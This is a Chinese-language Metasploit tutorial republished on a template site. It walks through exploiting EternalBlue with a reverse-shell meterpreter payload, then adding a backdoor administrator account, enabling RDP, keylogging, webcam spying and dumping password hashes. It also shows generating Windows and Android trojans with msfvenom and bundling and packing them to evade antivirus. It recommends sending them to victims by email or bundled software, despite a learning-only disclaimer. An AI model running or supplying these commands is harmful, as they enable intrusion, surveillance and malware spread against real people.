數(shù)據(jù)來(lái)源
??本文僅用于信息安全學(xué)習(xí),請(qǐng)遵守相關(guān)法律法規(guī),嚴(yán)禁用于非法途徑。若觀眾因此作出任何危害網(wǎng)絡(luò)安全的行為,后果自負(fù),與本人無(wú)關(guān)。?
得到ip地址我們能干嘛?
????????首先進(jìn)行端口掃描
為什么要進(jìn)行端口掃描?
????????端口掃描的作用就是發(fā)現(xiàn)目標(biāo)主機(jī)開(kāi)放的端口及其對(duì)應(yīng)開(kāi)放的服務(wù),攻擊者通過(guò)發(fā)現(xiàn)及利用服務(wù)所存在的漏洞,入侵目標(biāo)主機(jī)。
-?Nmap?-掃描器之王
metasploit是什么?
????????msf是一款開(kāi)源安全漏洞利用和測(cè)試工具,集成了各種平臺(tái)上常見(jiàn)的溢岀漏洞和流行的 shellcode,并持續(xù)保持更新。
????????netasploiti讓復(fù)雜的漏洞攻擊流程變的非常簡(jiǎn)單,一個(gè)電腦小白經(jīng)過(guò)幾小時(shí)的學(xué)習(xí),就能對(duì)操作系統(tǒng)等主流漏洞發(fā)起危害性攻擊。?
啟動(dòng) metasploit 前需要做:
- 打開(kāi)ka終端
- 使用 sudo su命令,并輸入kali的密碼kali,切換至root用戶
- 使用 msfdb init命令初始化 metasploit數(shù)據(jù)庫(kù)(*可選)?
metasploit攻擊 windows操作系統(tǒng)
????????msfconsole? ? ? ? ? ?#?啟動(dòng) metasploita命令行【命令行效率高,使用方便】
msf使用法則:
????????使用模塊? ->? 配置模塊必選項(xiàng)? ->? 運(yùn)行模塊。??????? 三步操作,就能實(shí)現(xiàn)對(duì)主流漏洞的攻擊?
永恒之藍(lán)漏洞:
????????永恒之藍(lán)是指2017年4月14日晚,黑客團(tuán)體 ShadowBrokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具,其中包含“永恒之藍(lán)”工具,“永恒之藍(lán)”利用 Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權(quán)限。5月12日,不法分子通過(guò)改造“永恒之藍(lán)”制作了 Wannacry勒索病毒,英國(guó)、俄羅斯、整個(gè)歐洲以及中國(guó)國(guó)內(nèi)多個(gè)高校校內(nèi)網(wǎng)、大型企業(yè)內(nèi)網(wǎng)和政府機(jī)構(gòu)專網(wǎng)中招,被勒索支付高額贖金才能解密恢復(fù)文件。
metasploit攻擊永恒之藍(lán)全流程:
1. 使用模塊
????????use exploit/windows/smb/ms17_010_eternalblue
2. 設(shè)置必選項(xiàng)
????????查看必選項(xiàng)【*required 為yes的就是必選項(xiàng)】?
????????show options
或者
1. 搜索漏洞編號(hào):
????????search ms17_010? ? ? ?# 搜索2017年的10號(hào)漏洞永恒之藍(lán)(微軟定義),search 使用
2.?使用模塊
?????????可以通過(guò)模塊名稱或模塊編號(hào)使用模塊
????????use exploit/windows/smb/ms17_010_eternalblue? # 通過(guò)模塊名稱使用模塊
????????或(選擇一種方式即可)
????????use 0? ??????????????????????????????????????????????????????????????????????????# 通過(guò)模塊編號(hào)使用模塊
3. 查看模塊所需要的配置內(nèi)容
????????show options? ? ? ? ? ? ? # 可以按tab鍵自動(dòng)補(bǔ)全命令,show?顯示/展示? ?options? 選項(xiàng)
????????必選項(xiàng)是:yes 的就是必選設(shè)置,一些是有默認(rèn)的,一些是沒(méi)有默認(rèn)的就需要我們添加,如目標(biāo)主機(jī)狀態(tài)是yes,但是當(dāng)前設(shè)置時(shí)空。
實(shí)驗(yàn):
????????1、準(zhǔn)備一臺(tái)靶機(jī)(我這里開(kāi)了一臺(tái)winXP),并查看靶機(jī)的IP地址(等下用做攻擊目標(biāo))
????????ipconfig????????? # 查看本機(jī)IP地址
? ? ? ??ifconfig eth0? # kali查看IP?
?2、回到kli設(shè)置metasploit的必選項(xiàng),攻擊目標(biāo)這些
?????????set RHOSTS 192.168.0.103? ?# 設(shè)置目標(biāo)IP地址,set? (設(shè)置)RHOSTS 目標(biāo)主機(jī)的名稱,代表你要攻擊誰(shuí),目標(biāo)主機(jī)地址也可以寫一個(gè)范圍如:192.168.0.103-254
????????show options? ? ? ? ? ? ? # show?顯示/展示? ?options? 選項(xiàng),查看還有什么需要設(shè)置的
????????set payload windows/x64/meterpreter/reverse_tcp? #?payload 是攻擊載荷,就是攻擊完成后想干啥,這里是想獲取 meterpreter (默認(rèn)就是這個(gè))meterpreter是 metasploit 后滲透的神器?
????????set LHOST 192.168.0.102????????? #?LHOSTS為 listen host (偵聽(tīng)主機(jī))代表你是誰(shuí),既kali的IP地址默認(rèn)就是kali自己的IP地址,如果你的不是那就可以修改
????????set lport 10001? ?# 將端口設(shè)置為10001,代表你要在kali上開(kāi)啟的端口,1-65535隨便選,但不能被占用,默認(rèn)的端口是:4444,為了攻擊的成功率可以改一下
????????show options? ? ? ? ? ? ? # 查看配置
?3、啟動(dòng)運(yùn)行模塊,開(kāi)啟攻擊
????????命令:run
????????我這里攻擊失敗了,原因:192.168.0.103:445-由于失敗而中止利用漏洞:無(wú)目標(biāo):此模塊僅支持x64(64位)目標(biāo)?????????
開(kāi)一臺(tái)64位操作系統(tǒng)的虛擬機(jī),繼續(xù)實(shí)驗(yàn)
繼續(xù)查看主機(jī)IP
重新設(shè)置攻擊目標(biāo)
?????set RHOSTS?192.168.0.106???# 設(shè)置目標(biāo)IP地址
?啟動(dòng)運(yùn)行模塊,開(kāi)啟攻擊
????????命令:run
?????攻擊成功命令行就會(huì)來(lái)到meterpreter>,這里就是拿到了目標(biāo)主機(jī)的權(quán)限?
?攻擊成功,拿到了對(duì)方的權(quán)限可以干嘛?可以輸入:help? ?# 查看幫助
?核心命令
命令? ? |
說(shuō)明 |
? | “幫助”菜單 |
?background? | 當(dāng)前會(huì)話的背景 |
bg | 背景別名 |
bgkill | 殺死背景meterpreter腳本 |
bglist | 列出正在運(yùn)行的后臺(tái)腳本 |
bgrun | 作為后臺(tái)線程執(zhí)行meterpreter腳本 |
channel | 顯示信息或控制活動(dòng)通道 |
close | 關(guān)閉頻道 |
detach | 分離meterpreter會(huì)話(對(duì)于http/https) |
disable_unicode_encoding | 禁用unicode字符串的編碼 |
enable_unicode_encoding | 啟用unicode字符串的編碼 |
exit ? ? ? ? ? ? ? ? ? ? ? | 終止meterpreter會(huì)話 |
get_timeouts | 獲取當(dāng)前會(huì)話超時(shí)值 |
guid | 獲取會(huì)話guid |
help ? ? ? ? ? ? ? ? ? ? ? | 幫助菜單 |
info | 顯示有關(guān)Post模塊的信息 |
irb | 在當(dāng)前會(huì)話上打開(kāi)交互式Ruby shell |
load ? ? ? ? ? ? ? ? ? ? ? | 加載一個(gè)或多個(gè)meterpreter擴(kuò)展 |
machine_id | 獲取連接到會(huì)話的計(jì)算機(jī)的MSF id |
migrate ? ? ? ? ? ? ? ? ?? | 將服務(wù)器遷移到另一個(gè)進(jìn)程 |
pivot | 管理數(shù)據(jù)透視偵聽(tīng)器 |
pry ? ? ? ? ? ? ? ? ? ? ?? | 在當(dāng)前會(huì)話上打開(kāi)Pry調(diào)試器 |
quit ? ? ? ? ? ? ? ? ? ? ? | 終止meterpreter會(huì)話 |
read | 從通道讀取數(shù)據(jù) |
resource | 運(yùn)行存儲(chǔ)在文件中的命令 |
run | 執(zhí)行meterpreter腳本或Post模塊 |
secure ? ? ? ? ? ? ? ? ? ? | (重新)協(xié)商TLV數(shù)據(jù)包加密 |
sessions ? ? ? ? ? ? ? ? ? | 快速切換到另一個(gè)會(huì)話 |
set_timeouts | 設(shè)置當(dāng)前會(huì)話超時(shí)值 |
sleep | 強(qiáng)制儀表安靜,然后重新建立會(huì)話,用法:用法:sleep<秒數(shù)> |
ssl_verify | 修改ssl證書驗(yàn)證設(shè)置 |
transport ? ? ? ? ? ? ? ?? | 管理運(yùn)輸機(jī)制 |
use | “l(fā)oad”的別名已棄用 |
uuid | 獲取當(dāng)前會(huì)話的uuid |
write | 將數(shù)據(jù)寫入通道 |
Stdapi:文件系統(tǒng)命令
命令 | 說(shuō)明 |
cat | 將文件的內(nèi)容讀到屏幕上 |
cd | 更改目錄 |
checksum | 檢索文件的校驗(yàn)和 |
cp | 將源復(fù)制到目標(biāo) |
del | 刪除指定的文件 |
dir | 列表文件(ls的別名) |
download | 下載文件或目錄 |
edit ? ? ? ? ? | 編輯文件 |
getlwd | 打印本地工作目錄 |
getwd | 打印工作目錄 |
lcat | 將本地文件的內(nèi)容讀取到屏幕 |
lcd |
更改本地工作目錄 |
lls | 列出本地文件 |
lpwd | 打印本地工作目錄 |
ls | 列表文件 |
mkdir | 創(chuàng)建新目錄 |
mv | 將源文件移動(dòng)到目標(biāo) |
pwd | 打印工作目錄 |
rm | 刪除指定的文件 |
rmdir | 刪除目錄 |
search ? ? ? ? | 搜索文件 |
show_mount | 列出所有裝載點(diǎn)/邏輯驅(qū)動(dòng)器 |
upload | 上載文件或目目錄(可以用來(lái)上傳文件到對(duì)方電腦) |
Stdapi:網(wǎng)絡(luò)命令
命令 | 說(shuō)明 |
arp | 顯示主機(jī)arp緩存 |
getproxy | 顯示當(dāng)前代理配置 |
ifconfig | 顯示界面 |
ipconfig | 顯示IP界面 |
netstat | 顯示網(wǎng)絡(luò)連接與對(duì)方開(kāi)放的端口 |
portfwd | 將本地端口轉(zhuǎn)發(fā)到遠(yuǎn)程服務(wù) |
resolve ? ? ?? | 解析目標(biāo)上的一組主機(jī)名 |
route | 查看和修改路由表 |
Stdapi:系統(tǒng)命令
命令 | 說(shuō)明 |
clearev | 清除事件日志 |
drop_token | 放棄任何活動(dòng)模擬令牌。 |
execute ? ? ?? | 執(zhí)行命令 |
getenv | 獲取一個(gè)或多個(gè)環(huán)境變量值 |
getpid | 獲取當(dāng)前進(jìn)程標(biāo)識(shí)符 |
getprivs | 嘗試啟用當(dāng)前進(jìn)程可用的所有權(quán)限 |
getsid | 獲取服務(wù)器正在運(yùn)行的用戶的SID |
getuid | 獲取服務(wù)器運(yùn)行的用戶 |
kill | 終止進(jìn)程 |
localtime | 顯示目標(biāo)系統(tǒng)的本地日期和時(shí)間 |
pgrep | 按名稱篩選進(jìn)程 |
pkill | 按名稱終止進(jìn)程 |
ps | 列出正在運(yùn)行的進(jìn)程 |
reboot | 重新啟動(dòng)遠(yuǎn)程計(jì)算機(jī) |
reg | 修改并與遠(yuǎn)程注冊(cè)表交互 |
rev2self | 在遠(yuǎn)程計(jì)算機(jī)上調(diào)用RevertToSelf() |
shell | 放入系統(tǒng)命令shell |
shutdown | 關(guān)閉遠(yuǎn)程計(jì)算機(jī) |
stealt_token | 嘗試從目標(biāo)進(jìn)程中竊取模擬令牌 |
suspend | 暫?;蚧謴?fù)進(jìn)程列表 |
sysinfo | 獲取有關(guān)遠(yuǎn)程系統(tǒng)的信息,如操作系統(tǒng) |
Stdapi:用戶界面命令
命令 | 說(shuō)明 |
enumdesktops | 列出所有可訪問(wèn)的桌面和窗口工作站 |
getdesktop | 獲取當(dāng)前meterpreter桌面 |
idletime | 返回遠(yuǎn)程用戶空閑的秒數(shù) |
keyboard_send | 發(fā)送鍵擊 |
keyevent | 發(fā)送按鍵事件 |
keyscan_dump | 轉(zhuǎn)儲(chǔ)擊鍵緩沖區(qū) |
keyscan_start | 開(kāi)始捕獲擊鍵 |
keyscan_stop | 停止捕獲擊鍵 |
mouse | 發(fā)送鼠標(biāo)事件 |
screenshare ? ? | 共享實(shí)時(shí)監(jiān)視遠(yuǎn)程用戶桌面 |
screenshot ? ?? | 截圖,獲取交互式桌面的截圖 |
setdesktop | 更改meterpreters當(dāng)前桌面 |
uictl | 控制一些用戶界面組件 |
Stdapi:正在使用網(wǎng)絡(luò)攝像頭命令
命令 | 說(shuō)明 |
record_mic | 從默認(rèn)麥克風(fēng)錄制音頻X秒 |
webcam_chat | 開(kāi)始視頻聊天 |
webcam_list | 列出網(wǎng)絡(luò)攝像頭 |
webcam_snap | 從指定的網(wǎng)絡(luò)攝像機(jī)拍攝快照 |
webcam_stream | 從指定的網(wǎng)絡(luò)攝像機(jī)播放視頻流(打開(kāi)攝像頭) |
Stdapi:音頻輸出命令
命令 | 說(shuō)明 |
play? | 在目標(biāo)系統(tǒng)上播放波形音頻文件(.wav) |
Priv:提升命令
命令 | 說(shuō)明 |
getsystem | 嘗試將您的權(quán)限提升到本地系統(tǒng)的權(quán)限 |
密碼數(shù)據(jù)庫(kù)命令
命令 | 說(shuō)明 |
hashdump | 轉(zhuǎn)儲(chǔ)SAM數(shù)據(jù)庫(kù)的內(nèi)容 |
Priv:時(shí)間戳命令
命令 | 說(shuō)明 |
timestomp | 操縱文件MACE屬性 |
攻擊成功后的命令使用:
????????攻擊成功后成功獲取到對(duì)方主機(jī)的權(quán)限,上面的這操作命令直接輸入到命令行使用就行了
?注意:上面表格中的命令我也沒(méi)有仔細(xì)檢查過(guò),如果使用時(shí)出現(xiàn)報(bào)錯(cuò)那應(yīng)該是我填錯(cuò)了,這時(shí)可以輸入命令:
????????help? ?# 查看幫助,按類型獲取到正確的命令,也可以在下方給我留言我會(huì)及時(shí)更改。
攻擊成功后的使用示例:?
????????攻擊成功后能做什么meterpreter是強(qiáng)大的后滲透模塊,可以輸入help查看幫助信息
????????遠(yuǎn)程控制、命令執(zhí)行、攝像頭監(jiān)控、密碼獲取、創(chuàng)建后門用戶、破壞篡改系統(tǒng)...這些看起來(lái)非常復(fù)雜又高級(jí)的操作都能用 meterpreter中一行或幾個(gè)字母,簡(jiǎn)單的命令完成
例:創(chuàng)建后門用戶并開(kāi)啟遠(yuǎn)程連接(3389)?
????????shell? ? ??????????????????????????????????????????????????????#?啟動(dòng)dos窗口,這樣就能使用DOS 命令
????????chcp 65001? ????????????????????????????????????????????# 默認(rèn)情況下編碼為936,中文會(huì)出現(xiàn)亂碼問(wèn)題,65001為UTF-8的代碼頁(yè),可以正常顯示中文
????????net user zhangsan 123456 /add & net localgroup administrators zhangsan /add?
????????或分開(kāi)執(zhí)行
????????net user zhangsan 123456 /add?? ? ? ? ? ? ?# 創(chuàng)建一個(gè)用戶名為“zhangsan ”密碼是“123456 ”
????????net localgroup administrators zhangsan /add?? ?# 將zhangsan 加入到管理員組(提升權(quán)限)
????????exit????????????????? ? ? ? ? ? ?? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?# 退到上一級(jí)目錄(這里是退出dos窗口回到,meterpreter >?)
????????getsystem? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??? ? ??#??先將當(dāng)前的session提升為system權(quán)限(以防萬(wàn)一)
????????run post/windows/manage/enable_rdp? ?#??利用此后滲透模塊即可直接開(kāi)啟遠(yuǎn)程桌面,開(kāi)啟受害者主機(jī)3389端口(遠(yuǎn)程桌面連接端口)
????????這樣一套命令下來(lái),以后我們就可以直接使用?zhangsan 這個(gè)賬號(hào)登錄3389端口的遠(yuǎn)程桌面服務(wù),遠(yuǎn)程控制目標(biāo)主機(jī)(mstsc -v 目標(biāo)ip)
rdesktop 192.168.0.103:3389? # 連接受害者主機(jī)的遠(yuǎn)程桌面,如下圖所示:
需要注意的是你登錄了,對(duì)方會(huì)被你擠下線?
1)使用Kali滲透工具生成遠(yuǎn)控木馬
????????想遠(yuǎn)程控制別人?msfvenom 生成遠(yuǎn)控木馬了解一下
????????msfvenom 是用來(lái)生成后門的軟件,在目標(biāo)機(jī)上執(zhí)行后門,在本地監(jiān)聽(tīng)上線。
? ? ? 【* msfvenom在shell里使用,不是 msfconsole 終端】
????????payload????????攻擊載荷?
????????windows?? ? ??是指微軟的windows操作系統(tǒng),如果目標(biāo)是其他系統(tǒng)這里就改成其他系統(tǒng)名稱如:Linux
? ? ? ? lhost?? ? ? ? ? ? ??代表你是誰(shuí),既kali的IP地址
????????lport? ? ? ? ? ? ??代表你要在kali上開(kāi)啟的端口,1-65535隨便選,但不能被占用
????????-f? ? ? ? ? ? ? ? ? ??是指format(格式)
????????exe ???????????????是windows格式文件,是指生成木馬文件的文件格式,exe 和 dll(Windows 系列)、elf(Linux 系列)和 Mach-O(Mac系列)
? ? ? ? -o? ? ? ? ? ? ? ? ? 是指output(輸出),后面跟的demo.exe是文件名,自定義隨便改。
????????msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102?lport=9988?-f exe -o demo.exe?
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.89 LPORT=9988 R > /home/kali/Desktop/lanxf.apk
?
?生成木馬文件示例:
????????輸入:exit? ? # 退回上一級(jí),直到回到kali的命令行中
?????????msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102 lport=9988 -f exe -o demo999.exe? ?# 生成木馬文件
????????現(xiàn)在文件就生成到桌面的我們可以在桌面查看文件?
?????????這個(gè)文件可以通過(guò)郵箱或其他社交平臺(tái)發(fā)送給對(duì)方,然后對(duì)方運(yùn)行了之后我們就可以對(duì)他電腦進(jìn)行遠(yuǎn)程控制(不過(guò)一般情況下會(huì)被對(duì)方的殺毒軟件直接殺死)如下面這樣,我們直接把木馬文件復(fù)制到自己的真實(shí)機(jī),殺毒軟件會(huì)自動(dòng)檢測(cè)并殺死。
????????注意:這里是在命令行的桌面路徑下輸入命令所以文件默認(rèn)是生成在桌面,如果想改生成文件的位置,那就把命令后面的文件名改成路徑加文件名,如:/home/kali/demo999.exe? ??;蛘呤褂妹睿篶d 路徑? ?# 更改命令行的路徑
生成木馬就完事?把木馬文件發(fā)送到目標(biāo)主機(jī)
(注意這一步需要使用上面寫的方法通過(guò)metasploit獲取到目標(biāo)的權(quán)限才行,如果對(duì)方電腦沒(méi)有漏洞獲取不到對(duì)方權(quán)限,那就需要用釣魚的方式讓受害者自己下載,比如我們?cè)诎俣壬舷螺d的軟件都有很多捆綁軟件)
????????pwd?????????????????????????????????????????????????????????????????# 打印目標(biāo)的工作目錄
????????upload /home/kali/桌面/demo999.exe? ????????# 把木馬文件發(fā)送到目標(biāo)的電腦上
???????upload /home/kali/桌面/demo999.exe d:\\? ? # 也可以指定文件路徑,發(fā)送到對(duì)方的D盤根目錄下
記得在 msfconsole里開(kāi)啟監(jiān)聽(tīng),等待受害者運(yùn)行上鉤?
????????現(xiàn)在有了木馬文件,我們要讓別人下載,俗稱:“釣魚”?
首先:制作魚鉤
????????msfconsole?????????????????????????# 啟動(dòng) metasploita命令行
????????use exploit/multi/handler? ?# 使用模塊
????????show options? ? ? ? ? ? ? ? ? ? ? ? # 查看設(shè)置,查看這個(gè)模塊需要配置那些選項(xiàng)才能使用
1)設(shè)置攻擊載荷:
?????????set payload windows/x64/meterpreter/reverse_tcp? ?# 這個(gè)攻擊載荷就是上面我們使用的攻擊載荷
????????show options? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? # 查看設(shè)置
2)設(shè)置偵聽(tīng)地址
????????set LHOST 192.168.0.102????????? #?LHOSTS為 listen host (偵聽(tīng)主機(jī))代表你是誰(shuí),既kali的IP地址
????????show options? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? # 查看設(shè)置
3)設(shè)置幀聽(tīng)端口:
????????set lport?9988? ?# 就是要在kali上要開(kāi)啟的端口,注意這里的端口要和前面生成木馬文件的端口一樣,我上面是用9988端口這里也要9988端口,默認(rèn)的端口是4444
4)運(yùn)行模塊:run? ?# 簡(jiǎn)單理解就是把魚鉤放到河里
現(xiàn)在我們要做的就是等待魚兒上鉤:
- 方法一:我們主動(dòng)將鉤子摁到魚兒上(利用漏洞)
- 方法二:姜太公釣魚,愿者上鉤!
假設(shè)目標(biāo)通過(guò)網(wǎng)上下載了其他軟件比如啥直播、游戲之類的,然后我的木馬文件也和這些軟件綁定了,他也運(yùn)行了,之后我們就可以對(duì)他進(jìn)行些操作。
通過(guò)命令運(yùn)行對(duì)方的木馬文件(需要使用上面寫的方法通過(guò)metasploit獲取到目標(biāo)的權(quán)限)
????????execute -H -i -f demo999.exe? ? ? ? ? # 運(yùn)行demo999.exe這個(gè)剛才我們發(fā)到目標(biāo)過(guò)去的木馬文件,?-H 不可見(jiàn),-i 交互
?然后輸入:???help? ?# 查看通過(guò)這個(gè)木馬文件我們能干啥,可以使用的功能和我上面列出來(lái)的命令一樣
webcam_list | 列出網(wǎng)絡(luò)攝像頭(查看對(duì)方的電腦有沒(méi)有攝像頭) |
webcam_stream | 從指定的網(wǎng)絡(luò)攝像機(jī)播放視頻流(打開(kāi)攝像頭) |
我這里的目標(biāo)是虛擬機(jī)所以這塊,響應(yīng)的信息是沒(méi)有?
?
?ctrl + c 退出監(jiān)控
殺毒軟件會(huì)查殺怎么辦?一招教你躲避火絨的探測(cè)
????????最基礎(chǔ)的免殺【*對(duì)于其他殺毒軟件效果不同,具體情況請(qǐng)自行嘗試】
捆綁木馬(現(xiàn)在基本沒(méi)效果,殺毒軟件的技術(shù)更新了)
????????msfvenom -p windows/64/meterpreter/reverse tcp lhost=192.168.0.102?lport=9999 -f? exe-xnotepad++. exe -o notepad++.exe? ??
?加殼:壓縮殼、加密殼
如:Themida
使用示例:
????????打開(kāi)軟件?
然后耐心等待加密過(guò)程,最后加密成功的界面如下,之后就可以關(guān)閉軟件了。
然后可以復(fù)制到真實(shí)機(jī)上測(cè)試
文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-457085.html
?????????后門木馬請(qǐng)勿隨意傳播,如果造成危害屬于提供計(jì)算機(jī)操作系統(tǒng)入侵工具罪及非法入侵計(jì)算機(jī)操作系統(tǒng)數(shù)罪并罰。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-457085.html
到了這里,關(guān)于進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)鞯奈恼戮徒榻B完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!